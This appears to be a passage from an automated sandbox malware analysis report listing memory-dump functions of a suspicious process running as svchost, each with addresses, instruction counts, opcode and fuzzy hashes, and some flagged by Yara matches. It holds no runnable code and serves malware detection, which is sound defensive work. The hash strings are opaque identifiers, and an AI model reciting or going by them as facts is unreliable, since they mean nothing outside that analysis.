                                                                                        • Source File: 00000002.00000002.2490432116.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_3800000_svchost.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 296c77c80f35948b53e7e1890173835cd97fd1caecc5ad7ad8524c25a60152e8
                                                                                        • Instruction ID: d409071a3bb02fd0d2cb3daf3b8a3ad448391074a6e6aa020c39248891d451e6
                                                                                        • Opcode Fuzzy Hash: 296c77c80f35948b53e7e1890173835cd97fd1caecc5ad7ad8524c25a60152e8
                                                                                        • Instruction Fuzzy Hash: 34512E75A002295FDB14DFE9C8809BAB7E6EF84350B1941E9FE55DB384DA34C942C7A0
                                                                                        Function 038F132D Relevance: .2, Instructions: 188COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.2490432116.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_3800000_svchost.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: c80cb6c654f3a78efef1338952cfddabee062ad737b2c2a0f24e03971c1df182
                                                                                        • Instruction ID: dfc74398d2c5e772e7eab1011212bdb97b356979cf88c9b8df3556edea05e8b4
                                                                                        • Opcode Fuzzy Hash: c80cb6c654f3a78efef1338952cfddabee062ad737b2c2a0f24e03971c1df182
                                                                                        • Instruction Fuzzy Hash: FF819075A00609DFCB09CFA8C494AAEB7F1FF88300F1981A9D859EB341D734EA41CB90
                                                                                        Function 038F903E Relevance: .2, Instructions: 186COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.2490432116.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_3800000_svchost.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 3250cf024880870faa9c5ad1c26047e068f1f29bab5294ff4f285e687626646f
                                                                                        • Instruction ID: 2273140ae4edc3b4749dafbc22235ce0d01fe021dca60118836202fe99fed868
                                                                                        • Opcode Fuzzy Hash: 3250cf024880870faa9c5ad1c26047e068f1f29bab5294ff4f285e687626646f
                                                                                        • Instruction Fuzzy Hash: C461FF75600715AFD715DFA8C884FABBBA9FF88314F044699FA68CB240DB30E514CB92
                                                                                        Function 038FFCF2 Relevance: .2, Instructions: 181COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.2490432116.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_3800000_svchost.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 03c7bc177400e0dec292428483b1400752a56f4822118b71f90a012f6dce8f62
                                                                                        • Instruction ID: c5751a62ee6e6681754c140f9dccd50604a9b70b39284fa5bde0307e13e7066e
                                                                                        • Opcode Fuzzy Hash: 03c7bc177400e0dec292428483b1400752a56f4822118b71f90a012f6dce8f62
                                                                                        • Instruction Fuzzy Hash: A661B031A0020A9FCB14DFA8C880ABEB7F5FF48314F2485A9E715EB284E730A955CB50
                                                                                        Function 03837703 Relevance: .2, Instructions: 179COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.2490432116.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_3800000_svchost.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 6c0072cb5f47e79b433399a98b39a485b23e894e978a5426eb17627063efc843
                                                                                        • Instruction ID: 974476aac17894f85ff5d4f4f3bf17d3496ff9aaf0a204f5a26706dfd1664bb5
                                                                                        • Opcode Fuzzy Hash: 6c0072cb5f47e79b433399a98b39a485b23e894e978a5426eb17627063efc843
                                                                                        • Instruction Fuzzy Hash: 526146B5A04605DFDB18DFB8C480AADFBB5FF49204F1885AAE519E7340DB30A941CBD5
                                                                                        Function 038F92A6 Relevance: .2, Instructions: 174COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.2490432116.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_3800000_svchost.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 452edfbfcf0e94ae9579f2424e653f9f0e782d4fcd20f6cafa21f2e1fa618322
                                                                                        • Instruction ID: 6406965f086ba6e9c82f1113a33b4eba4c353da444db4f8b0277176e79e13ef5
                                                                                        • Opcode Fuzzy Hash: 452edfbfcf0e94ae9579f2424e653f9f0e782d4fcd20f6cafa21f2e1fa618322
                                                                                        • Instruction Fuzzy Hash: 1761D2356047428FD311CFE8C494B6AB7E0BF90718F1844EDEA95CB291DB75E806CB92
                                                                                        Function 038FCE93 Relevance: .2, Instructions: 172COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.2490432116.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_3800000_svchost.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: adaef8c90542e90ae6fae2448e28977f4ff712f71b9da8e8631f75b3b546fe51
                                                                                        • Instruction ID: ba0a3bbf2e31ab8815f0f0ada3089fca3684e8bd6fb97d98af30cd48bb3004f8
                                                                                        • Opcode Fuzzy Hash: adaef8c90542e90ae6fae2448e28977f4ff712f71b9da8e8631f75b3b546fe51
                                                                                        • Instruction Fuzzy Hash: 1C51273260430A4FC714DEADC85076BF7E6EFC1250F1984EDEA55CB249DA70DA09C7A1
                                                                                        Function 0040FD53 Relevance: .2, Instructions: 165COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.2490110495.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: baad548f5feed02f012b2fc10accbe050e72558d66b692510d210734a80849a9
                                                                                        • Instruction ID: 2121c664a8c5830da041c923ef2f7bbf52f7bd70e106dfbbfbc710aa3fcfd6ec
                                                                                        • Opcode Fuzzy Hash: baad548f5feed02f012b2fc10accbe050e72558d66b692510d210734a80849a9
                                                                                        • Instruction Fuzzy Hash: CF5173B3E14A214BD3188E09CC40631B792EFD8312B5F81BEDD199B397CE74E9519A90
                                                                                        Function 038F7D73 Relevance: .2, Instructions: 160COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.2490432116.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_3800000_svchost.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 0d4c2f23153c0f050869ee9c44789e14721915e3afdf32270ef548deb90245de
                                                                                        • Instruction ID: d30810fafd4122f796602ccc4d9387015b95d5248c6080fd4915fac75d0d38a0
                                                                                        • Opcode Fuzzy Hash: 0d4c2f23153c0f050869ee9c44789e14721915e3afdf32270ef548deb90245de
                                                                                        • Instruction Fuzzy Hash: A051C636A101498FCB08CFB8C4806AEB7F5EF98354F1982BAD915DB355E734DA15CB90
                                                                                        Function 0040FD4E Relevance: .2, Instructions: 159COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.2490110495.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 3f75038a1893a4934b6a3f4db3a6868c1102ce525b26c96f83ed9d494807d0d7
                                                                                        • Instruction ID: 44a6e7bdd143c2028cf6b39cf1abbbdefa585b31e840b2417f544b6a839c3603
                                                                                        • Opcode Fuzzy Hash: 3f75038a1893a4934b6a3f4db3a6868c1102ce525b26c96f83ed9d494807d0d7
                                                                                        • Instruction Fuzzy Hash: E65173B3E14A214BD3188F09CC50631B692EFD8312B5F81BEDD199B397CE74E9529A90
                                                                                        Function 03843740 Relevance: .2, Instructions: 159COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.2490432116.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_3800000_svchost.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 259bc67154f92e8588db42d1dd0be34ff39f069d257d431aa8e18c7d2dcf7d34
                                                                                        • Instruction ID: 9d7e0845faac2c7a366e6ae1356b80b899da8e1d1d202aec2f2f41697ea92cf2
                                                                                        • Opcode Fuzzy Hash: 259bc67154f92e8588db42d1dd0be34ff39f069d257d431aa8e18c7d2dcf7d34
                                                                                        • Instruction Fuzzy Hash: F151EF79A0061EAFC711CFA8C4806A9F7B0FF54710B0982E5E895DBB40E774E9A1CBC0
                                                                                        Function 03837152 Relevance: .2, Instructions: 158COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.2490432116.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_3800000_svchost.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 509a2c55ce54a41229e56678be0c357681a649a505367bd8187faa01e4e3560c
                                                                                        • Instruction ID: 1edf9a8dddd538e4372f83734b54718913ec847087b5d73e36828a5c80bed974
                                                                                        • Opcode Fuzzy Hash: 509a2c55ce54a41229e56678be0c357681a649a505367bd8187faa01e4e3560c
                                                                                        • Instruction Fuzzy Hash: 2F51DD76A0460AAFEB15DBA8C848BADB7B4BF45314F1840EAE402E7390DB749901CB81
                                                                                        Function 038B3A6C Relevance: .2, Instructions: 156COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.2490432116.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_3800000_svchost.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: e35dc6df433bbc23aa1037a218c2b193e902cb60ec7878117738c9de64b9a32a
                                                                                        • Instruction ID: fe6831343a0dd974b171251d7fa6090e3a9228aa5c84e5f7c23910be501e923d
                                                                                        • Opcode Fuzzy Hash: e35dc6df433bbc23aa1037a218c2b193e902cb60ec7878117738c9de64b9a32a
                                                                                        • Instruction Fuzzy Hash: 0E518F36E4052E4BEF24CA98D461BEFB3F3EB44310F480859E855BB3C4C6B66956D650
                                                                                        Function 038AD800 Relevance: .2, Instructions: 155COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.2490432116.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_3800000_svchost.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: a019e2bdd095e92c4f1b911f00d898aeec97230776cc1cd0c043051c14f15c9e
                                                                                        • Instruction ID: 82dfc4f5314b6283eadddb1ca963c894f7975946fca5c9bc6c265ad2f71fee20
                                                                                        • Opcode Fuzzy Hash: a019e2bdd095e92c4f1b911f00d898aeec97230776cc1cd0c043051c14f15c9e
                                                                                        • Instruction Fuzzy Hash: 7951DF74A00A15ABEB14DFADC4A0ABEB7F4FF45704B0841E9ED81DBA90E734D854CB91
                                                                                        Function 038FD26B Relevance: .2, Instructions: 153COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.2490432116.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_3800000_svchost.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: e34a641792a2e79be6bf0067dfbea21fe876c0422c27924c31e583a14ba6783b
                                                                                        • Instruction ID: 3f5e18785c6a06264d425c3460866a9dd0d2d228bb65cc75348d814591c353db
                                                                                        • Opcode Fuzzy Hash: e34a641792a2e79be6bf0067dfbea21fe876c0422c27924c31e583a14ba6783b
                                                                                        • Instruction Fuzzy Hash: BC516C766087469FC311CFA8C884B5ABBE5FBC8344F04896DFA94DB244D734E949CB92
                                                                                        Function 038F7571 Relevance: .2, Instructions: 153COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.2490432116.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_3800000_svchost.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: a64994f0260d9b7c2d7ab7d5cf5366db0e8714c77eb2edde3f18efadbe3684f4
                                                                                        • Instruction ID: 39b82dc1bef0bf62bb781630d89e4c25692caaf2f10ec27776d309b117247abd
                                                                                        • Opcode Fuzzy Hash: a64994f0260d9b7c2d7ab7d5cf5366db0e8714c77eb2edde3f18efadbe3684f4
                                                                                        • Instruction Fuzzy Hash: 1C51E631A04119AFEB14DFE9D844A7EFBB9FF48394F0841A9EA01DB254DB74AD11CB80
                                                                                        Function 038351ED Relevance: .1, Instructions: 149COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.2490432116.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_3800000_svchost.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 4094c6502c39d1d731f1cf305bb035faa1a88a7ae08f7a0eb0dc3de2060effa8
                                                                                        • Instruction ID: b005fbed5598a6996e000ff30227f9765ceb6e596d24eb2849d13a6cb084054b
                                                                                        • Opcode Fuzzy Hash: 4094c6502c39d1d731f1cf305bb035faa1a88a7ae08f7a0eb0dc3de2060effa8
                                                                                        • Instruction Fuzzy Hash: EE517A75A05319DFEF21DAE9C840BADB3B8BB4B718F1804D9E811EB350D7B59940CB92
                                                                                        Function 0386F71F Relevance: .1, Instructions: 143COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.2490432116.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_3800000_svchost.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 95ecd57946e0a5a64177b81d924df4bde54ae60dd99d3c72d8131c662fc79554
                                                                                        • Instruction ID: 00be488476703ac0e5ba5f90800f459ac019ccf5e41cd7e544bed92cb8157dc9
                                                                                        • Opcode Fuzzy Hash: 95ecd57946e0a5a64177b81d924df4bde54ae60dd99d3c72d8131c662fc79554
                                                                                        • Instruction Fuzzy Hash: 61417476D04269ABDF11DBE8D844AAFB6BCAF05654F0901E6E901FB600DA34DE01C7E5
                                                                                        Function 038601F8 Relevance: .1, Instructions: 138COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.2490432116.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_3800000_svchost.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 8f45adb53c8f08393f1d1b25220cc8f94eb6accd3328aa103b40358d9b1839f4
                                                                                        • Instruction ID: 4e62361e391e788de25f8af4534774a0c8b5de5a1556b23bae1e1b3bb7bf28d4
                                                                                        • Opcode Fuzzy Hash: 8f45adb53c8f08393f1d1b25220cc8f94eb6accd3328aa103b40358d9b1839f4
                                                                                        • Instruction Fuzzy Hash: B941B0B69042189BCB15DFE8C440AEDF7B4BF88714F18819AE816FB340D7349D41CBA9
                                                                                        Function 03872750 Relevance: .1, Instructions: 137COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.2490432116.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_3800000_svchost.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: f9143dc9ab32c0c56755980999bbdd100a6c23c33ec6549c8632214e05dba9ed
                                                                                        • Instruction ID: 2115050ae33e37bbf985f1322b53dd63ba96682ed1ac158466c9db919e26533e
                                                                                        • Opcode Fuzzy Hash: f9143dc9ab32c0c56755980999bbdd100a6c23c33ec6549c8632214e05dba9ed
                                                                                        • Instruction Fuzzy Hash: 83515975A01619CFDB18CF98C480AAEF7B6FF84710F2881A9D815E7750D738AE41CB90
                                                                                        Function 038AD1C0 Relevance: .1, Instructions: 135COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.2490432116.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_3800000_svchost.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 0eb649ebbf3548d8df43d0789ceff5cfbc550e3c64e1c06ae1f98d8f26ebe946
                                                                                        • Instruction ID: dd10ec4756a55ea49ec61822341dc628d057288e0fc62628e37ea593b60e4853
                                                                                        • Opcode Fuzzy Hash: 0eb649ebbf3548d8df43d0789ceff5cfbc550e3c64e1c06ae1f98d8f26ebe946
                                                                                        • Instruction Fuzzy Hash: 4C512775A00605DFDB18CFA8C4916A9FBF1FF48314B1881AED819D7745E734EA94CB90
                                                                                        Function 03836154 Relevance: .1, Instructions: 133COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.2490432116.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_3800000_svchost.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: dca7b6243bff59e9ef1a4165e2370ab8c3a4188e538f443528fe59cb8f2c20f3
                                                                                        • Instruction ID: 6ee9fffaca05a82db7059ddc4e214bc7603421db4cef9e5c50eab4745dc922f4
                                                                                        • Opcode Fuzzy Hash: dca7b6243bff59e9ef1a4165e2370ab8c3a4188e538f443528fe59cb8f2c20f3
                                                                                        • Instruction Fuzzy Hash: 8551077090461AEBDB25DBACCC44BA8BBB5EF02318F1942E5D425DB7C0E7789981CF81
                                                                                        Function 0382B136 Relevance: .1, Instructions: 131COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.2490432116.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_3800000_svchost.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: ab4a37587c3a749f685c783aae75f6446d564923da48f9f10bcd2d7fb23c3ecb
                                                                                        • Instruction ID: 20c9c9c0068b13b4805291dd1c5cc4f3da263d8f4c47b1310159a51dfd60ae80
                                                                                        • Opcode Fuzzy Hash: ab4a37587c3a749f685c783aae75f6446d564923da48f9f10bcd2d7fb23c3ecb
                                                                                        • Instruction Fuzzy Hash: EA4168B5641715AFDB22EFE8C880B2ABBF8EF40794F0484E9E511DB650D774D880CBA1
                                                                                        Function 038FF0E0 Relevance: .1, Instructions: 129COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.2490432116.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_3800000_svchost.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 21f588cca653bf6bf7ff777667e4e67bbca5924003cf57bdd5681a7104b4773a
                                                                                        • Instruction ID: fb2943e0861d58f953c2916a6b21fc42c7274becc80bd8b37b19af74eddab107
                                                                                        • Opcode Fuzzy Hash: 21f588cca653bf6bf7ff777667e4e67bbca5924003cf57bdd5681a7104b4773a
                                                                                        • Instruction Fuzzy Hash: 8E41CF712083418FC745CF69D8A487ABBE1EB84615F088A9EF9D58B282C730D909CB61
                                                                                        Function 038DD5B0 Relevance: .1, Instructions: 128COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.2490432116.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_3800000_svchost.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: baa0485de5dd7dc0c990a55128a2c5541222e3bdb6689f1808ffcb88d6f11d7f
                                                                                        • Instruction ID: 714b260aa47bbee0f8bd6764ce8576f1af851fc93a1ffc1b47becbfa2d2c7089
                                                                                        • Opcode Fuzzy Hash: baa0485de5dd7dc0c990a55128a2c5541222e3bdb6689f1808ffcb88d6f11d7f
                                                                                        • Instruction Fuzzy Hash: 6E41FF30A08294AFCB14DFA9D491ABAFBF1AF49304F0984C9E4C5CB245C734A45ADBE0
                                                                                        Function 0385D6E0 Relevance: .1, Instructions: 126COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.2490432116.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_3800000_svchost.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 18d22ca55913c12a9ab931d0b3e4ff0e32b1865b063cb828ba14c8b073b04705
                                                                                        • Instruction ID: ae08384151e91b84e9fbb2f03aa0c1bc645d5f7f105efb4f5f78d0cac3388fab
                                                                                        • Opcode Fuzzy Hash: 18d22ca55913c12a9ab931d0b3e4ff0e32b1865b063cb828ba14c8b073b04705
                                                                                        • Instruction Fuzzy Hash: 2441CF795087009BD724FFA9C890B2BB7A9EB95321F0405AEFD15CF291DB30E845CB92
                                                                                        Function 0382A020 Relevance: .1, Instructions: 122COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.2490432116.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_3800000_svchost.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 165ca662f4b1c8196e57a2c4173bd848e06efaa623a98917432a96e6c9651090
                                                                                        • Instruction ID: 09c726aa4c3b650cebf03845b6edebce30ca4a73f8e20a6b8b93337b10bdfc6a
                                                                                        • Opcode Fuzzy Hash: 165ca662f4b1c8196e57a2c4173bd848e06efaa623a98917432a96e6c9651090
                                                                                        • Instruction Fuzzy Hash: 26412B31A00225DBDB29EFD984507BAFB62EFD0754F1980EAE945DB240DA399DC0CB91
                                                                                        Function 03860710 Relevance: .1, Instructions: 121COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.2490432116.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_3800000_svchost.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: cfe855aa5370e709d3beaf8d0a0824e85895befd2a0058a9eb758e5aacecaf96
                                                                                        • Instruction ID: 6d5559716921e31d85c6eb997522498f319fbd89f4da3c3261faae45ee80a02f
                                                                                        • Opcode Fuzzy Hash: cfe855aa5370e709d3beaf8d0a0824e85895befd2a0058a9eb758e5aacecaf96
                                                                                        • Instruction Fuzzy Hash: FB4117B5A04709EFCB24CF98C980AAAB7F9FF08704B1049ADE556DB650D730EA44CF94
                                                                                        Function 0383262C Relevance: .1, Instructions: 119COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.2490432116.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_3800000_svchost.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 430d0bec9d5c667de88bf9881ef621763692281ab3f39de665e3ad912068696c
                                                                                        • Instruction ID: 87e6f1a24801fa1d13b48a1178b83f405aff86718a2e7ce04e8ac7d1644cc94e
                                                                                        • Opcode Fuzzy Hash: 430d0bec9d5c667de88bf9881ef621763692281ab3f39de665e3ad912068696c
                                                                                        • Instruction Fuzzy Hash: 1E41BE74501B18CFCB21EFA8D940A69B7F5FF86314F148AE9C516DB7A0EB309941CB82
                                                                                        Function 038FFFB1 Relevance: .1, Instructions: 117COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.2490432116.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_3800000_svchost.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 1c348dc658c2e1fb301cc7eaaf1681c523b74cc4ad9df3d57e6a4a8196a65ae3
                                                                                        • Instruction ID: 50d3d387ffbfc471d24381124b5f48d8a13db0f76fce455a3d50bdc9f129498d
                                                                                        • Opcode Fuzzy Hash: 1c348dc658c2e1fb301cc7eaaf1681c523b74cc4ad9df3d57e6a4a8196a65ae3
                                                                                        • Instruction Fuzzy Hash: 72413A71A042955FC741CB2685A06BABFF5AF85245F0CC1E6D8C19B382D639C606C770
                                                                                        Function 038B07C3 Relevance: .1, Instructions: 114COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.2490432116.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_3800000_svchost.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 26baee6549687c57ea252be480a5ab37a867bc4bba612fc03b409d6bdb786f49
                                                                                        • Instruction ID: 5821c5960b6a4621b2340b8ff8f6075534942e46c86544b42d48eece2e59de44
